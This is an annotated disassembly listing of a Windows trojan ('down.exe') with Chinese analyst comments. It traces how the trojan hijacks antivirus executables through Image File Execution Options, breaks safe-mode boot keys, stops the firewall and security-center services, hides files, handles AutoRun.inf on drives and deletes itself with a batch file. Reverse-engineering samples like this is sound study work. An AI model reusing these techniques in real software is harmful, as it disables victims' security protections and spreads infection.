00405263 |. 68 40534000 push down.00405340 ; ASCII "\InProcServer32"
00405268 |. 8D45 DC lea eax,[local.9]
0040526B |. BA 03000000 mov edx,3
00405270 |. E8 73E4FFFF call down.004036E8
00405275 |. 8B45 DC mov eax,[local.9] ; "CLSID\{4ED44634-4634-ED47-34ED-634D4634ED47}\InProcServer32")
00405278 |. E8 ABE5FFFF call down.00403828
0040527D |. 50 push eax ; /subkey="CLSID\{4ED44634-4634-ED47-34ED-634D4634ED47}\InProcServer32")
0040527E |. 68 00000080 push 80000000 ; |hKey = HKEY_CLASSES_ROOT
00405283 |. E8 2CEDFFFF call down.00403FB4 ; \RegDeleteKeyA
00405288 |. 8D45 D8 lea eax,[local.10]
0040528B |. 8B4D F8 mov ecx,[local.2]
0040528E |. BA 30534000 mov edx,down.00405330 ; ASCII "CLSID"
00405293 |. E8 DCE3FFFF call down.00403674
00405298 |. 8B45 D8 mov eax,[local.10] ; "CLSID\{4ED44634-4634-ED47-34ED-634D4634ED47}")
0040529B |. E8 88E5FFFF call down.00403828
004052A0 |. 50 push eax ; /subkey="CLSID\{4ED44634-4634-ED47-34ED-634D4634ED47}")
004052A1 |. 68 00000080 push 80000000 ; |hKey = HKEY_CLASSES_ROOT
004052A6 |. E8 09EDFFFF call down.00403FB4 ; \RegDeleteKeyA
00407A4C /$ 55 push ebp ; service,AUTO START
00407A4D |. 8BEC mov ebp,esp
00407A4F |. B9 09000000 mov ecx,9
00407A54 |> 6A 00 /push 0
00407A56 |. 6A 00 |push 0
00407A58 |. 49 |dec ecx
00407A59 |.^ 75 F9 \jnz short down.00407A54
00407A5B |. 53 push ebx
00407A5C |. 56 push esi
00407A5D |. 33D2 xor edx,edx
00407A5F |. 55 push ebp
00407A60 |. 68 337E4000 push down.00407E33
00407A65 |. 64:FF32 push dword ptr fs:[edx]
00407A68 |. 64:8922 mov dword ptr fs:[edx],esp
00407A6B |. 3C 01 cmp al,1
00407A6D |. 0F85 46020000 jnz down.00407CB9
00407A73 |. 8D45 FC lea eax,[local.1]
00407A76 |. 50 push eax ; /pThreadId
00407A77 |. 6A 00 push 0 ; |CreationFlags = 0
00407A79 |. 6A 01 push 1 ; |pThreadParm = 00000001
00407A7B |. 68 2C784000 push down.0040782C ; |ThreadFunction = down.0040782C
00407A80 |. 6A 00 push 0 ; |StackSize = 0
00407A82 |. 6A 00 push 0 ; |pSecurity = NULL
00407A84 |. E8 BBC5FFFF call down.00404044 ; \CreateThread
00407A89 |. BB 58000000 mov ebx,58
00407A8E |. BE 94A24000 mov esi,down.0040A294
00407A93 |> 8D45 F0 /lea eax,[local.4]
00407A96 |. E8 05D4FFFF |call down.00404EA0
00407A9B |. 8B45 F0 |mov eax,[local.4]
00407A9E |. 8D55 F4 |lea edx,[local.3]
00407AA1 |. E8 72D9FFFF |call down.00405418
00407AA6 |. 8B45 F4 |mov eax,[local.3] ; "C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dat")
00407AA9 |. E8 7ABDFFFF |call down.00403828
00407AAE |. 50 |push eax ; "C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dat")
00407AAF |. 68 487E4000 |push down.00407E48 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
00407AB4 |. FF36 |push dword ptr ds:[esi]
00407AB6 |. 68 9C7E4000 |push down.00407E9C ; ASCII ".exe"
00407ABB |. 8D45 EC |lea eax,[local.5]
00407ABE |. BA 03000000 |mov edx,3
00407AC3 |. E8 20BCFFFF |call down.004036E8
00407AC8 |. 8B45 EC |mov eax,[local.5]
00407ACB |. E8 58BDFFFF |call down.00403828
00407AD0 |. 8BD0 |mov edx,eax
00407AD2 |. B9 A47E4000 |mov ecx,down.00407EA4 ; ASCII "Debugger"
00407AD7 |. B8 02000080 |mov eax,80000002 ; "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe"
00407ADC |. E8 83CCFFFF |call down.00404764
00407AE1 |. 83C6 04 |add esi,4
00407AE4 |. 4B |dec ebx
00407AE5 |.^ 75 AC \jnz short down.00407A93
00407AE7 |. BB 09000000 mov ebx,9
00407AEC |. BE FCA34000 mov esi,down.0040A3FC
00407AF1 |> 8D45 E4 /lea eax,[local.7]
00407AF4 |. E8 A7D3FFFF |call down.00404EA0
00407AF9 |. 8B45 E4 |mov eax,[local.7] ; "C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dat")
00407AFC |. 8D55 E8 |lea edx,[local.6]
00407AFF |. E8 14D9FFFF |call down.00405418
00407B04 |. 8B45 E8 |mov eax,[local.6]
00407B07 |. E8 1CBDFFFF |call down.00403828
00407B0C |. 50 |push eax ; "C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dat")
00407B0D |. 68 487E4000 |push down.00407E48 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
00407B12 |. FF36 |push dword ptr ds:[esi] ; ASCII "KvXP_1"
00407B14 |. 68 B87E4000 |push down.00407EB8 ; ASCII ".kxp"
00407B19 |. 8D45 E0 |lea eax,[local.8]
00407B1C |. BA 03000000 |mov edx,3
00407B21 |. E8 C2BBFFFF |call down.004036E8
00407B26 |. 8B45 E0 |mov eax,[local.8] ; "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp")
00407B29 |. E8 FABCFFFF |call down.00403828
00407B2E |. 8BD0 |mov edx,eax
00407B30 |. B9 A47E4000 |mov ecx,down.00407EA4 ; ASCII "Debugger"
00407B35 |. B8 02000080 |mov eax,80000002
00407B3A |. E8 25CCFFFF |call down.00404764
00407B3F |. 83C6 04 |add esi,4
00407B42 |. 4B |dec ebx
00407B43 |.^ 75 AC \jnz short down.00407AF1
00407B45 |. BB 03000000 mov ebx,3
00407B4A |. BE 20A44000 mov esi,down.0040A420
00407B4F |> 8D45 D8 /lea eax,[local.10]
00407B52 |. E8 49D3FFFF |call down.00404EA0
00407B57 |. 8B45 D8 |mov eax,[local.10]
00407B5A |. 8D55 DC |lea edx,[local.9]
00407B5D |. E8 B6D8FFFF |call down.00405418
00407B62 |. 8B45 DC |mov eax,[local.9]
00407B65 |. E8 BEBCFFFF |call down.00403828
00407B6A |. 50 |push eax
00407B6B |. 8B0E |mov ecx,dword ptr ds:[esi]
00407B6D |. 8D45 D4 |lea eax,[local.11]
00407B70 |. BA 487E4000 |mov edx,down.00407E48 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" 镜像劫持
00407B75 |. E8 FABAFFFF |call down.00403674
00407B7A |. 8B45 D4 |mov eax,[local.11]
00407B7D |. E8 A6BCFFFF |call down.00403828
00407B82 |. 8BD0 |mov edx,eax ; SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com 镜像劫持
00407B84 |. B9 A47E4000 |mov ecx,down.00407EA4 ; ASCII "Debugger"
00407B89 |. B8 02000080 |mov eax,80000002
00407B8E |. E8 D1CBFFFF |call down.00404764
00407B93 |. 83C6 04 |add esi,4
00407B96 |. 4B |dec ebx
00407B97 |.^ 75 B6 \jnz short down.00407B4F
00407B99 |. B0 01 mov al,1
00407B9B |. E8 EC080000 call down.0040848C
00407BA0 |. BB 03000000 mov ebx,3
00407BA5 |. BE E0A44000 mov esi,down.0040A4E0
00407BAA |> 6A 04 /push 4
00407BAC |. 8B0E |mov ecx,dword ptr ds:[esi]
00407BAE |. 8D45 D0 |lea eax,[local.12]
00407BB1 |. BA C87E4000 |mov edx,down.00407EC8 ; ASCII "SYSTEM\CurrentControlSet\Services" 创建服务
00407BB6 |. E8 B9BAFFFF |call down.00403674
00407BBB |. 8B55 D0 |mov edx,[local.12]
00407BBE |. B9 F47E4000 |mov ecx,down.00407EF4 ; ASCII "Start"
00407BC3 |. B8 02000080 |mov eax,80000002
00407BC8 |. E8 6BC9FFFF |call down.00404538 ; F7进去是创建注册表键值
00407BCD |. 83C6 04 |add esi,4
00407BD0 |. 4B |dec ebx
00407BD1 |.^ 75 D7 \jnz short down.00407BAA
00407BD3 |. BB 02000000 mov ebx,2
00407BD8 |. BE 04A54000 mov esi,down.0040A504
00407BDD |> 8B0E /mov ecx,dword ptr ds:[esi]
00407BDF |. 8D45 CC |lea eax,[local.13]
00407BE2 |. BA 047F4000 |mov edx,down.00407F04 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" 自启动
00407BE7 |. E8 88BAFFFF |call down.00403674
00407BEC |. 8B55 CC |mov edx,[local.13]
00407BEF |. 33C9 |xor ecx,ecx
00407BF1 |. B8 02000080 |mov eax,80000002
00407BF6 |. E8 91CAFFFF |call down.0040468C ; F7进去删除一些注册表键值
00407BFB |. 83C6 04 |add esi,4
00407BFE |. 4B |dec ebx
00407BFF |.^ 75 DC \jnz short down.00407BDD
00407C01 |. 33C9 xor ecx,ecx
00407C03 |. BA 4C7F4000 mov edx,down.00407F4C ; ASCII "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}" 修改安全模式
00407C08 |. B8 02000080 mov eax,80000002
00407C0D |. E8 7ACAFFFF call down.0040468C
00407C12 |. 33C9 xor ecx,ecx
00407C14 |. BA B07F4000 mov edx,down.00407FB0 ; ASCII "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}"安全模式
00407C19 |. B8 02000080 mov eax,80000002
00407C1E |. E8 69CAFFFF call down.0040468C
00407C23 |. 6A 02 push 2
00407C25 |. B9 14804000 mov ecx,down.00408014 ; ASCII "Hidden"
00407C2A |. BA 24804000 mov edx,down.00408024 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" 隐藏文件夹
00407C2F |. B8 01000080 mov eax,80000001
00407C34 |. E8 FFC8FFFF call down.00404538 ; F7 进去 对注册表的操作
00407C39 |. 6A 00 push 0
00407C3B |. B9 68804000 mov ecx,down.00408068 ; ASCII "CheckedValue"
00407C40 |. BA 80804000 mov edx,down.00408080 ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"隐藏文件夹
00407C45 |. B8 02000080 mov eax,80000002
00407C4A |. E8 E9C8FFFF call down.00404538
00407C4F |. B8 DC804000 mov eax,down.004080DC ; ASCII "SharedAccess"
00407C54 |. E8 3F0A0000 call down.00408698 ; F7进去 关闭防火墙服务
00407C59 |. B8 F4804000 mov eax,down.004080F4 ; ASCII "wscsvc"
00407C5E |. E8 350A0000 call down.00408698 ; 关闭监视系统安全设置和配置
{
004086C2 |. E8 41DAFFFF call down.00406108 ; jmp 到 advapi32.OpenSCManagerA
004086C7 |. 8BF0 mov esi,eax
004086C9 |. 68 FF010F00 push 0F01FF
004086CE |. 8B45 FC mov eax,[local.1]
004086D1 |. E8 52B1FFFF call down.00403828
004086D6 |. 50 push eax
004086D7 |. 56 push esi
004086D8 |. E8 33DAFFFF call down.00406110 ; jmp 到 advapi32.OpenServiceA
004086DD |. 8BD8 mov ebx,eax
004086DF |. 85DB test ebx,ebx
004086E1 |. 76 0C jbe short down.004086EF
004086E3 |> 8D45 E0 lea eax,[local.8]
004086E6 |. 50 push eax
004086E7 |. 6A 01 push 1
004086E9 |. 53 push ebx
004086EA |. E8 11DAFFFF call down.00406100 ; jmp 到 advapi32.ControlService
004086EF |> 53 push ebx
004086F0 |. E8 03DAFFFF call down.004060F8 ; jmp 到 advapi32.CloseServiceHandle
004086F5 |. 56 push esi
004086F6 |. E8 FDD9FFFF call down.004060F8 ; jmp 到 advapi32.CloseServiceHandle
}
00407C63 |. B0 01 mov al,1
00407C65 |. E8 3AFAFFFF call down.004076A4 ; F7进去瞧瞧。。对防护软件的处理
{
004076D6 |. E8 EDDCFFFF |call down.004053C8 ; 通过(kernel32.GetSystemDirectoryA)获取系统目录
004076DB |. FF75 F0 |push [local.4] ; "C:\WINDOWS\system32")
004076DE |. FF33 |push dword ptr ds:[ebx>; "KvNative"
004076E0 |. 68 08784000 |push down.00407808 ; ASCII ".exe"
004076E5 |. 8D45 FC |lea eax,[local.1]
004076E8 |. BA 03000000 |mov edx,3
004076ED |. E8 F6BFFFFF |call down.004036E8
004076F2 |. 8D45 EC |lea eax,[local.5]
004076F5 |. E8 CEDCFFFF |call down.004053C8 ; 通过(kernel32.GetSystemDirectoryA)获取系统目录
004076FA |. FF75 EC |push [local.5] ; "C:\WINDOWS\system32")
004076FD |. FF33 |push dword ptr ds:[ebx>; "KvNative"
004076FF |. 68 18784000 |push down.00407818 ; ASCII ".bak"
00407704 |. 8D45 F8 |lea eax,[local.2]
00407707 |. BA 03000000 |mov edx,3
0040770C |. E8 D7BFFFFF |call down.004036E8
00407711 |. 8B45 FC |mov eax,[local.1] ; "C:\WINDOWS\system32\KvNative.exe")
00407714 |. E8 0FC1FFFF |call down.00403828
00407719 |. 8BF8 |mov edi,eax ; "C:\WINDOWS\system32\KvNative.exe")
0040771B |. 57 |push edi ; /filename="C:\WINDOWS\system32\KvNative.exe")
0040771C |. E8 5BC9FFFF |call down.0040407C ; \GetFileAttributesA
00407721 |. 83F8 FF |cmp eax,-1
00407724 |. 74 1D |je short down.00407743
00407726 |. 8B45 F8 |mov eax,[local.2]
00407729 |. E8 FAC0FFFF |call down.00403828
0040772E |. 50 |push eax ; /FileName
0040772F |. E8 18C9FFFF |call down.0040404C ; \DeleteFileA
00407734 |. 8B45 F8 |mov eax,[local.2]
00407737 |. E8 ECC0FFFF |call down.00403828
0040773C |. 50 |push eax ; /NewName
0040773D |. 57 |push edi ; |ExistingName
0040773E |. E8 A1C9FFFF |call down.004040E4 ; \MoveFileA
00407743 |> 83C3 04 |add ebx,4
00407746 |. 4E |dec esi
00407747 |.^ 75 8A \jnz short down.004076D>; 这里是个循环处理安全防护软件
}
00407C6A |. B0 01 mov al,1
00407C6C |. E8 87050000 call down.004081F8 ; F7进去瞧瞧。。对防护软件的处理
{
00408225 |. BA D8834000 mov edx,down.004083D8 ; ASCII "SoftWare\Microsoft"
0040822A |. E8 19B3FFFF call down.00403548
0040822F |. 8D45 D8 lea eax,[local.10]
00408232 |. BA F4834000 mov edx,down.004083F4 ; ASCII "Windows\CurrentVersion\Run"
00408237 |. E8 F4B3FFFF call down.00403630
....
....
....
0040826A |. E8 B9B5FFFF |call down.00403828
0040826F |. 50 |push eax ; |Subkey
00408270 |. 8B45 FC |mov eax,[local.1] ; |
00408273 |. 50 |push eax ; |hKey
00408274 |. E8 6BBDFFFF |call down.00403FE4 ; \RegOpenKeyExA
00408279 |. 85C0 |test eax,eax
0040827B |. 0F85 0C010000 |jnz down.0040838D
00408281 |. 6A 00 |push 0 ; /pLastWrite = NULL
00408283 |. 6A 00 |push 0 ; |pSecurity = NULL
00408285 |. 6A 00 |push 0 ; |pMaxValueLength = NULL
00408287 |. 8D45 E4 |lea eax,[local.7] ; |
0040828A |. 50 |push eax ; |pMaxValueNameLength
0040828B |. 8D45 E8 |lea eax,[local.6] ; |
0040828E |. 50 |push eax ; |pnValues
0040828F |. 6A 00 |push 0 ; |pMaxClassLength = NULL
00408291 |. 6A 00 |push 0 ; |pMaxSubkeyLength = NULL
00408293 |. 8D45 EC |lea eax,[local.5] ; |
00408296 |. 50 |push eax ; |pnSubkeys
00408297 |. 6A 00 |push 0 ; |Reserved = NULL
00408299 |. 6A 00 |push 0 ; |pClassCount = NULL
0040829B |. 6A 00 |push 0 ; |Class = NULL
0040829D |. 8B45 F8 |mov eax,[local.2] ; |
004082A0 |. 50 |push eax ; |hKey
004082A1 |. E8 46BDFFFF |call down.00403FEC ; \RegQueryInfoKeyA
004082A6 |. 85C0 |test eax,eax
004082A8 |. 0F85 D6000000 |jnz down.00408384
004082AE |. 8B55 E4 |mov edx,[local.7]
004082B1 |. 42 |inc edx
004082B2 |. 8D45 E0 |lea eax,[local.8]
004082B5 |. E8 9EB6FFFF |call down.00403958
004082BA |. 837D E8 00 |cmp [local.6],0
004082BE |. 0F84 BE000000 |je down.00408382
004082C4 |. 8B45 E8 |mov eax,[local.6]
004082C7 |. 48 |dec eax
004082C8 |. 85C0 |test eax,eax
004082CA |. 0F82 B2000000 |jb down.00408382
004082D0 |. 40 |inc eax
004082D1 |. 8945 D4 |mov [local.11],eax
004082D4 |. C745 F4 00000>|mov [local.3],0
004082DB |> 8B45 E4 |/mov eax,[local.7]
004082DE |. 40 ||inc eax
004082DF |. 8945 F0 ||mov [local.4],eax
004082E2 |. 6A 00 ||push 0
004082E4 |. 6A 00 ||push 0
004082E6 |. 6A 00 ||push 0
004082E8 |. 6A 00 ||push 0
004082EA |. 8D45 F0 ||lea eax,[local.4]
004082ED |. 50 ||push eax
004082EE |. 8B45 E0 ||mov eax,[local.8]
004082F1 |. E8 32B5FFFF ||call down.00403828
004082F6 |. 50 ||push eax ; |Value
004082F7 |. 8B45 F4 ||mov eax,[local.3] ; |
004082FA |. 50 ||push eax ; |Index
004082FB |. 8B45 F8 ||mov eax,[local.2] ; |
004082FE |. 50 ||push eax ; |hKey
004082FF |. E8 C8BCFFFF ||call down.00403FCC ; \RegEnumValueA
00408304 |. 8D45 DC ||lea eax,[local.9] ; 枚举自启动都有啥
00408307 |. 50 ||push eax
00408308 |. 8B45 E0 ||mov eax,[local.8]
0040830B |. E8 18B5FFFF ||call down.00403828
00408310 |. 50 ||push eax
00408311 |. 8B45 D8 ||mov eax,[local.10]
00408314 |. E8 0FB5FFFF ||call down.00403828
00408319 |. 8BD0 ||mov edx,eax ; "SoftWare\Microsoft\Windows\CurrentVersion\Run")
0040831B |. 8B45 FC ||mov eax,[local.1]
....
....
....
00408382 |> B3 01 |mov bl,1
00408384 |> 8B45 F8 |mov eax,[local.2]
00408387 |. 50 |push eax ; /hKey
00408388 |. E8 17BCFFFF |call down.00403FA4 ; \RegCloseKey
0040838D |> 47 |inc edi
0040838E |. 83FF 02 |cmp edi,2
00408391 |.^ 0F85 AEFEFFFF \jnz down.00408245 ; 循环处理安全防护软件的启动项
}
00407C71 |. BB 06000000 mov ebx,6
00407C76 |. BE ECA44000 mov esi,down.0040A4EC
00407C7B |> 68 04814000 /push down.00408104 ; ASCII "CLSID"
00407C80 |. FF36 |push dword ptr ds:[esi]
00407C82 |. 68 14814000 |push down.00408114 ; ASCII "\InprocServer32"
00407C87 |. 8D45 C8 |lea eax,[local.14]
00407C8A |. BA 03000000 |mov edx,3
00407C8F |. E8 54BAFFFF |call down.004036E8
00407C94 |. 8B45 C8 |mov eax,[local.14]
00407C97 |. E8 8CBBFFFF |call down.00403828
00407C9C |. 50 |push eax ; /subkey= CLSID\{32CD708B-60A7-4C00-9377-D73EAA495F0F}\InprocServer32
00407C9D |. 68 00000080 |push 80000000 ; |hKey = HKEY_CLASSES_ROOT
00407CA2 |. E8 0DC3FFFF |call down.00403FB4 ; \RegDeleteKeyA
00407CA7 |. 83C6 04 |add esi,4
00407CAA |. 4B |dec ebx
00407CAB |.^ 75 CE \jnz short down.00407C7B
00407CAD |. B0 01 mov al,1
00407CAF |. E8 6C0A0000 call down.00408720
00407CB4 |. E9 5F010000 jmp down.00407E18
00407CB9 |> 8B45 F8 mov eax,[local.2]
00407CBC |. BA 2C814000 mov edx,down.0040812C ; ASCII " "
00407CC1 |. E8 AEBAFFFF call down.00403774
00407CC6 |. 75 07 jnz short down.00407CCF
00407CC8 |. 6A 00 push 0 ; /hKey = 0
00407CCA |. E8 05C3FFFF call down.00403FD4 ; \RegFlushKey
00407CCF |> BB 58000000 mov ebx,58
00407CD4 |. BE 94A24000 mov esi,down.0040A294
00407CD9 |> 68 487E4000 /push down.00407E48 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
00407CDE |. FF36 |push dword ptr ds:[esi]
00407CE0 |. 68 9C7E4000 |push down.00407E9C ; ASCII ".exe"
00407CE5 |. 8D45 C4 |lea eax,[local.15]
00407CE8 |. BA 03000000 |mov edx,3
00407CED |. E8 F6B9FFFF |call down.004036E8
00407CF2 |. 8B45 C4 |mov eax,[local.15]
00407CF5 |. E8 2EBBFFFF |call down.00403828
00407CFA |. 50 |push eax ; /Subkey
00407CFB |. 68 02000080 |push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00407D00 |. E8 AFC2FFFF |call down.00403FB4 ; \RegDeleteKeyA
00407D05 |. 83C6 04 |add esi,4
00407D08 |. 4B |dec ebx
00407D09 |.^ 75 CE \jnz short down.00407CD9
00407D0B |. BB 09000000 mov ebx,9
00407D10 |. BE FCA34000 mov esi,down.0040A3FC
00407D15 |> 68 487E4000 /push down.00407E48 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
00407D1A |. FF36 |push dword ptr ds:[esi]
00407D1C |. 68 B87E4000 |push down.00407EB8 ; ASCII ".kxp"
00407D21 |. 8D45 C0 |lea eax,[local.16]
00407D24 |. BA 03000000 |mov edx,3
00407D29 |. E8 BAB9FFFF |call down.004036E8
00407D2E |. 8B45 C0 |mov eax,[local.16]
00407D31 |. E8 F2BAFFFF |call down.00403828
00407D36 |. 50 |push eax ; /Subkey
00407D37 |. 68 02000080 |push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00407D3C |. E8 73C2FFFF |call down.00403FB4 ; \RegDeleteKeyA
00407D41 |. 83C6 04 |add esi,4
00407D44 |. 4B |dec ebx
00407D45 |.^ 75 CE \jnz short down.00407D15
00407D47 |. BB 03000000 mov ebx,3
00407D4C |. BE 20A44000 mov esi,down.0040A420
00407D51 |> 8B0E /mov ecx,dword ptr ds:[esi]
00407D53 |. 8D45 BC |lea eax,[local.17]
00407D56 |. BA 487E4000 |mov edx,down.00407E48 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
00407D5B |. E8 14B9FFFF |call down.00403674
00407D60 |. 8B45 BC |mov eax,[local.17]
00407D63 |. E8 C0BAFFFF |call down.00403828
00407D68 |. 50 |push eax ; /Subkey
00407D69 |. 68 02000080 |push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00407D6E |. E8 41C2FFFF |call down.00403FB4 ; \RegDeleteKeyA
00407D73 |. 83C6 04 |add esi,4
00407D76 |. 4B |dec ebx
00407D77 |.^ 75 D8 \jnz short down.00407D51
00407D79 |. 33C0 xor eax,eax
00407D7B |. E8 0C070000 call down.0040848C
00407D80 |. BB 03000000 mov ebx,3
00407D85 |. BE E0A44000 mov esi,down.0040A4E0
00407D8A |> 6A 03 /push 3
00407D8C |. 8B0E |mov ecx,dword ptr ds:[esi]
00407D8E |. 8D45 B8 |lea eax,[local.18]
00407D91 |. BA C87E4000 |mov edx,down.00407EC8 ; ASCII "SYSTEM\CurrentControlSet\Services"
00407D96 |. E8 D9B8FFFF |call down.00403674
00407D9B |. 8B55 B8 |mov edx,[local.18]
00407D9E |. B9 F47E4000 |mov ecx,down.00407EF4 ; ASCII "Start"
00407DA3 |. B8 02000080 |mov eax,80000002
00407DA8 |. E8 8BC7FFFF |call down.00404538
00407DAD |. 83C6 04 |add esi,4
00407DB0 |. 4B |dec ebx
00407DB1 |.^ 75 D7 \jnz short down.00407D8A
00407DB3 |. 68 30814000 push down.00408130 ; ASCII "DiskDrive"
00407DB8 |. B9 3C814000 mov ecx,down.0040813C
00407DBD |. BA 40814000 mov edx,down.00408140 ; ASCII "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}"
00407DC2 |. B8 02000080 mov eax,80000002
00407DC7 |. E8 98C9FFFF call down.00404764
00407DCC |. 68 30814000 push down.00408130 ; ASCII "DiskDrive"
00407DD1 |. B9 3C814000 mov ecx,down.0040813C
00407DD6 |. BA 9C814000 mov edx,down.0040819C ; ASCII "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}"
00407DDB |. B8 02000080 mov eax,80000002
00407DE0 |. E8 7FC9FFFF call down.00404764
00407DE5 |. 6A 01 push 1
00407DE7 |. B9 14804000 mov ecx,down.00408014 ; ASCII "Hidden"
00407DEC |. BA 24804000 mov edx,down.00408024 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" 自启动
00407DF1 |. B8 01000080 mov eax,80000001
00407DF6 |. E8 3DC7FFFF call down.00404538
00407DFB |. 6A 01 push 1
00407DFD |. B9 68804000 mov ecx,down.00408068 ; ASCII "CheckedValue"
00407E02 |. BA 80804000 mov edx,down.00408080 ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" 设置隐藏文件是否可见
00408CAF |. 6A 00 |push 0 ; /lParam = 0
00408CB1 |. 6A 00 |push 0 ; |wParam = 0
00408CB3 |. 6A 1A |push 1A ; |Message = WM_WININICHANGE
00408CB5 |. 68 FFFF0000 |push 0FFFF ; |hWnd = HWND_BROADCAST
00408CBA |. E8 BDB4FFFF |call down.0040417C ; \SendMessageA 发送消息
00408CBF |> 6A 00 |push 0 ; /lParam = 0
00408CC1 |. 6A 00 |push 0 ; |wParam = 0
00408CC3 |. 6A 1A |push 1A ; |Message = WM_WININICHANGE
00408CC5 |. 68 FFFF0000 |push 0FFFF ; |hWnd = HWND_BROADCAST
00408CCA |. E8 A5B4FFFF |call down.00404174 ; \PostMessageA
00408A4D |> /8D45 D0 /lea eax,[local.12]
00408A50 |. |8A13 |mov dl,byte ptr ds:[ebx]
00408A52 |. |E8 79ABFFFF |call down.004035D0
00408A57 |. |8B55 D0 |mov edx,[local.12]
00408A5A |. |8D45 FC |lea eax,[local.1]
00408A5D |. |B9 348B4000 |mov ecx,down.00408B34 ; ASCII ":"
00408A62 |. |E8 0DACFFFF |call down.00403674
00408A67 |. |8D45 F4 |lea eax,[local.3]
00408A6A |. |B9 408B4000 |mov ecx,down.00408B40 ; ASCII "AutoRun.inf"
00408A6F |. |8B55 FC |mov edx,[local.1]
00408A72 |. |E8 FDABFFFF |call down.00403674
00408A77 |. |8D45 F0 |lea eax,[local.4]
00408A7A |. |8B4D F8 |mov ecx,[local.2]
00408A7D |. |8B55 FC |mov edx,[local.1]
00408A80 |. |E8 EFABFFFF |call down.00403674
00408A85 |. |8B45 FC |mov eax,[local.1]
00408A88 |. |E8 9BADFFFF |call down.00403828
00408A8D |. |50 |push eax ; /RootPathName
00408A8E |. |E8 E1B5FFFF |call down.00404074 ; \GetDriveTypeA
00408A93 |. |66:83F8 03 |cmp ax,3
00408A97 |. |75 30 |jnz short down.00408AC9
00408A99 |. |6A 00 |push 0
00408A9B |. |8B45 F4 |mov eax,[local.3]
00408A9E |. |E8 85ADFFFF |call down.00403828
00408AA3 |. |8BF8 |mov edi,eax ; |
00408AA5 |. |57 |push edi ; |filename="D:\AutoRun.inf")
00408AA6 |. |E8 69B6FFFF |call down.00404114 ; \SetFileAttributesA
00408AAB |. |57 |push edi ; /FileName
00408AAC |. |E8 9BB5FFFF |call down.0040404C ; \DeleteFileA
00408AB1 |. |6A 00 |push 0
00408AB3 |. |8B45 F0 |mov eax,[local.4]
00408AB6 |. |E8 6DADFFFF |call down.00403828
00408ABB |. |8BF8 |mov edi,eax ; |
00408ABD |. |57 |push edi ; |FileName
00408ABE |. |E8 51B6FFFF |call down.00404114 ; \SetFileAttributesA
00408AC3 |. |57 |push edi ; /FileName
00408AC4 |. |E8 83B5FFFF |call down.0040404C ; \DeleteFileA
00408AC9 |> |43 |inc ebx
00408ACA |. |4E |dec esi
00408ACB |.^\75 80 \jnz short down.00408A4D ; 循环读取每个盘感染autufun.inf
00405492 |. 6A 00 push 0 ; /lParam = 0
00405494 |. 6A 00 push 0 ; |wParam = 0
00405496 |. 6A 1A push 1A ; |Message = WM_WININICHANGE
00405498 |. 68 FFFF0000 push 0FFFF ; |hWnd = HWND_BROADCAST
0040549D |. E8 DAECFFFF call down.0040417C ; \SendMessageA
004054A2 |> 8D85 68FFFFFF lea eax,[local.38]
004054A8 |. 50 push eax ; /pVersionInformation
004054A9 |. E8 06ECFFFF call down.004040B4 ; \GetVersionExA 获得系统版本
00405525 |. E8 4EFEFFFF call down.00405378 ; 获取系统目录
0040552A |. 8B95 28FEFFFF mov edx,[local.118] ; (ASCII "C:\WINDOWS")
00405530 |. 8D45 FC lea eax,[local.1]
00405533 |. B9 A8564000 mov ecx,down.004056A8 ; ASCII "Deleteme.bat"
00405538 |. E8 37E1FFFF call down.00403674
0040553D |. 8D95 24FEFFFF lea edx,[local.119]
00405543 |. 33C0 xor eax,eax
00405545 |. E8 1EEFFFFF call down.00404468
0040554A |. 8B85 24FEFFFF mov eax,[local.119]
00405550 |. 8D55 F8 lea edx,[local.2]
00405553 |. E8 C0FEFFFF call down.00405418
00405558 |. 6A 00 push 0
0040555A |. 8B45 F8 mov eax,[local.2]
0040555D |. E8 C6E2FFFF call down.00403828
00405562 |. 50 push eax ; |filename=C:\DOCUME~1\ADMINI~1\桌面\down.exe
00405563 |. E8 ACEBFFFF call down.00404114 ; \SetFileAttributesA
00405568 |. 8B55 FC mov edx,[local.1] ; "C:\WINDOWS\Deleteme.bat") 利用批处理进行自删除
0040556B |. 8D85 2CFEFFFF lea eax,[local.117]
00405571 |. E8 42D3FFFF call down.004028B8
00405576 |. 8D85 2CFEFFFF lea eax,[local.117]
0040557C |. E8 D3D0FFFF call down.00402654
00405581 |. E8 FACFFFFF call down.00402580
00405586 |. BA C0564000 mov edx,down.004056C0 ; ASCII ":try"
0040558B |. 8D85 2CFEFFFF lea eax,[local.117]
00405591 |. E8 26E4FFFF call down.004039BC
00405596 |. E8 39D6FFFF call down.00402BD4
0040559B |. E8 E0CFFFFF call down.00402580
